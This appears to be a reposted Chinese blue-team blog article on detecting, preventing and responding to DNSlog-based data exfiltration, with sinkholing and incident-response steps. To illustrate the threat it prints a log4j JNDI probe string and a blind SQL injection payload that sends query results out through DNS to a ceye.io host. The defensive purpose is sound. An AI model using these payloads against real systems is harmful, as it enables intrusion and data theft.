当前位置:   article > 正文

创新蓝队-针对DNSlog数据外带攻击的应急与预防_dnslog攻击

dnslog攻击

前言

DNS在解析的时候会留下日志,我们将信息放在高级域名中,传递到自己这里,然后通过读日志获取信息。

所以这里跟最初的猜想基本一致,原理也就是通过DNS请求后,通过读取日志来获取我们的请求信息。

本技战法以攻击视角为切入点,构建适用于任意行业网络安全的“DNSlog安全防御体系”。

以攻击者视角看DNSlog

(一)DNSlog用途

根据近年来攻防演练的经验,DNSlog经常被用于:数据无回显,命令执行,log4j漏洞检测,CSRF漏洞检测等所有涉及无回显,高隐蔽的攻击。

(二)使用DNSlog常用手段

DNSlog的使用,通常要和其他漏洞结合使用,有以下三种常见的方式:

  1. 命令执行无回显通过DNSlog执行命令,将数据带出网络,回显到DNSlog平台

图片

图片

2.近年的log4j漏洞的检测POC为:${jndi:ldap://ip:port/exp}以及一些变种、编码绕过等

3.SQL注入无回显利用

这是一条利用dnslog进行无回显注入

1.  ?id=1' and if((select load_file(concat('\\\\',(攻击代码),'.xxxxxx.ceye.io\\abc'))),1,0)--+

DNSlog攻击预防

(一)事前排查

  1. 如果是Java业务,并且使用了log4j,一是排查是否安装了最新补丁,自查资产。

  2. 将业务系统更新到最新系统,并且时刻检测是否有更新包

(二)提前预判,提前阻拦

通过FOFA、鹰图、钟馗之眼、360资产测绘、Shodan等资产测绘平台,以DNSlog平台为指纹,提前收集DNSlog地址,并且在域控DNS服务器添加正向解析,防止数据被外带。

配置如下

*.dnslog.cn A 127.0.0.1

这样所有DNS数据将被发送到本地,不被外带,留给充足的时间应急响应。

图片

图片

(三) 事中排查与分析

当发现服务器出现DNSlog数据外带的告警,通过以下方式开展排查与分析工作:

Wireshark抓包工具

事后溯源与处置

当发现服务器被植入了DNSlog流量,处置思路如下所示:

一是快速处置:首先隔离受影响的服务器。

二是分析目的地址:通过抓包,过滤出DNSlog的地址,确定为真实流量。

三是溯源分析:根据威胁分析平台中的威胁告警、Web访问流量等,综合判断攻击者通过什么漏洞进行的攻击,还原完整攻击链;

四是应急处置:先通过DNS服务器,重定向DNSlog地址到127.0.0.1,然后进行排查服务器的网络状态、异常文件、异常进程、异常用户、异常启动项、异常计划任务等,清除攻击者留下的后门。

五是修复漏洞:根据溯源分析还原的完整攻击链,制定相关漏洞修复方案,并进行修复。

六是缓解措施:若暂时无法修复漏洞,使用WAF封禁漏洞利用的接口,或通过代理服务器的访问规则屏蔽漏洞利用的接口。

七是业务恢复:处置完毕,业务重新上线。

关注公众号“知攻善防实验室”长期获取技术文章

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/黑客灵魂/article/detail/822806
推荐阅读
相关标签
  

闽ICP备14008679号